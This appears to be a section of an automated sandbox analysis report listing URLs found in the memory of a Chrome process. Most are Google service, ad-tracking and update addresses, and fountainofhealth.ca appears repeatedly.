                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://a-mo.net
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486301784.000028EC03948000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acxiom.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ad.doubleclick.net/activity;
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ade.googlesyndication.com/ddm/activity/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/pagead/regclk?
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adsmeasurement.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adtrafficquality.google
                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://angular.dev/license
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apex-football.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://atomex.net
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://audienceproject.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://beaconmax.com
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.alexmaccaw.com/css-transitions
                                  Source: chrome.exe, 00000000.00000003.2301920756.000028EC04738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302499245.000028EC027CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cct.google/taggy/agent.js
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472432149.000028EC028C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314832762.000028EC03E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315162936.000028EC05CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478797391.000028EC03124000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                                  Source: chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474190232.000028EC02B3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468969997.000028EC0238C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                                  Source: chrome.exe, 00000000.00000002.2494870504.000028EC04694000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495137392.000028EC047A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487830908.000028EC03C14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301889387.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478072951.000028EC03020000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                                  Source: chrome.exe, 00000000.00000002.2441041835.000001E4AE417000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enle-bar?paramsencoded=
                                  Source: chrome.exe, 00000000.00000003.2314933821.000028EC077D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2474400651.000028EC02B68000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474751970.000028EC02BE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468969997.000028EC0238C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                                  Source: chrome.exe, 00000000.00000002.2480935660.000028EC03344000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474751970.000028EC02BE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481132877.000028EC0335C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
                                  Source: chrome.exe, 00000000.00000003.1856722271.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816499766.000028EC06B58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1937842158.000028EC04700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467012546.000028EC02204000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1937804335.000028EC03840000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816526769.000028EC04AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1897512538.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856752469.000028EC049D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/uma/v2
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://creative-serving.com
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.H
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.with
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.withcsp.with
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482084974.000028EC03404000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:99:0
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0cross-origin-opener-policy-report-only:sam
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dailymotion.com
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabjdbk
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdgajlp
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkehgbnf
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/lnu3li27zsanbe2hcsfjuvm5fq_1.0.7.1744928549/laoigpbl
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478462011.000028EC03084000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475912071.000028EC02D68000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477145789.000028EC02F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479649232.000028EC03230000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479649232.000028EC03230000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478884208.000028EC03140000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477677350.000028EC02FE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477822635.000028EC03004000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgzb5szf7x3so2hvkfx32p7bbuq_9805/hfnkpi
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/aevtvjsxpcrwhjvp5w32fej6zq_9.56.0/gcmjkm
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/p
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eloan.co.jp
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://explorefledge.com
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313183913.000028EC04904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca
                                  Source: chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378554126.000028EC08108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496495802.000028EC04980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400889050.000028EC0505C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485039398.000028EC03794000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/
                                  Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca//
